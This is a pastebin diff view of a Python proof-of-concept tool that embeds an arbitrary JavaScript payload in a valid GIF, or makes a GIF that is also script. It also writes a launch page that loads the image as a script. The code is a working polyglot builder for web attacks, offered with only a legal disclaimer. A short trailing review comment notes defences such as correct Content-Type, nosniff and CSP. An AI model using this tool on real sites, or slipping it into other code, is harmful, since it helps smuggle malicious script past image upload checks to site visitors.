View difference between Paste ID: 3j7B2mk3 and 6yUbfGX5
1
#!/usr/bin/env python2
2
#============================================================================================================#
3
#======= Simply injects a JavaScript Payload into a GIF. ====================================================#
4
#======= or it creates a JavaScript Payload as a GIF.    ====================================================#
5
#======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
6
#======= Author: marcoramilli.blogspot.com ==================================================================#
7
#======= Version: PoC (don't even think to use it in development env.) ======================================#
8
#======= Disclaimer: ========================================================================================#
9
#THIS IS NOT PEP3 FORMATTED
10
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
11
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
12
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
13
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
14
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
15
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
16
								#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
17
								#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
18
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
19
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
20
#POSSIBILITY OF SUCH DAMAGE.
21
#===========================================================================================================#
22
import argparse
23
import os
24
25
26
#---------------------------------------------------------
27
def _hexify(num):
28
	"""
29
	Converts and formats to hexadecimal
30
	"""
31
	num = "%x" % num
32
	if len(num) % 2:
33
		num = '0'+num
34
	return num.decode('hex')
35
36
37
#---------------------------------------------------------
38
def _generate_and_write_to_file(payload, fname):
39
    """
40
    Generates a fake but valid GIF within scriting
41
    """
42
    f = open(fname, "wb")
43
    header = (b'\x47\x49\x46\x38\x39\x61'  #Signature + Version  GIF89a
44
                        b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
45
                        b'\x0A\x00' #Smal Logical Screen Height
46
                        b'\x00' #GCTF
47
                        b'\xFF' #BackgroundColor
48
                        b'\x00' #Pixel Ratio
49
                        b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
50
                        b'\x2A\x2F' #Commenting out */
51
                        b'\x3D\x31\x3B' # enable the script side by introducing =1;
52
				        )
53
    trailer = b'\x3B'
54
	# I made this explicit, step by step .
55
    f.write(header)
56
    f.write(payload)
57
    f.write(trailer)
58
    f.close()
59
    return True
60
61
62
#---------------------------------------------------------
63
def _generate_launching_page(f):
64
	"""
65
	Creates the HTML launching page
66
	"""
67
	htmlpage ="""
68
								<html>
69
								<head><title>Opening an image</title> </head>
70
								<body>
71
									<img src=\"""" + f + """_malw.gif\"\>
72
									<script src= \"""" + f + """_malw.gif\"> </script>
73
								</body>
74
								</html>
75
			  """
76
	html = open("run.html", "wb")
77
	html.write(htmlpage);
78
	html.close()
79
	return True
80
81
82
#---------------------------------------------------------
83
def _inject_into_file(payload, fname):
84
	"""
85
	Injects the payload into existing GIF
86
	NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues
87
	"""
88
	# I know, I can do it all in memory and much more fast.
89
	# I wont do it here.
90
	with open(fname + "_malw.gif", "w+b") as fout:
91
		with open(fname, "rt") as fin:
92
			for line in fin:
93
				ls1 = line.replace(b'\x2A\x2F', b'\x00\x00')
94
				ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00')				
95
				fout.write(ls2)	            	
96
		fout.seek(6,0)
97
		fout.write(b'\x2F\x2A') #/*
98
99
	f = open(fname + "_malw.gif", "a+b") #appending mode
100
	f.write(b'\x2A\x2F\x3D\x31\x3B')
101
	f.write(payload)
102
	f.write(b'\x3B')
103
	f.close()
104
	return True
105
106
107
#---------------------------------------------------------
108
if __name__ == "__main__":
109
	parser = argparse.ArgumentParser()
110
	parser.add_argument("filename",help="the gif file name to be generated/or infected")
111
	parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
112
	parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
113
	args = parser.parse_args()
114
	print("""
115
					|======================================================================================================|
116
					| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
117
					| It is the end user's responsibility to obey all applicable local, state and federal laws.            |
118
					| Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
119
					|======================================================================================================|
120
					"""
121
         )
122
	if args.inject_to_existing_gif:
123
		 _inject_into_file(args.js_payload, args.filename)
124
	else:
125
		_generate_and_write_to_file(args.js_payload, args.filename)
126
127
	_generate_launching_page(args.filename)
128
	print "[+] Finished!"
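Review bot: The header comment block and the docstrings of `_generate_and_write_to_file` and `_inject_into_file` explain how the GIF/JavaScript polyglot is laid out, but they never state the condition it depends on: the output only runs as script because the `run.html` written by `_generate_launching_page` loads it through `<script src=...>` and the serving side lets an image response be used as script. I would add a header comment along the lines of `# Defensive note: serve uploaded images with their real Content-Type and "X-Content-Type-Options: nosniff", and restrict script-src via CSP, so a GIF is never accepted as a script source.` Re-encoding uploaded images on the server would presumably also discard the rewritten screen-width bytes and the data appended after the image, though nothing in this listing demonstrates that. The page no longer marks which lines differ between the two pastes, so this note applies to the file as a whole rather than to a specific change.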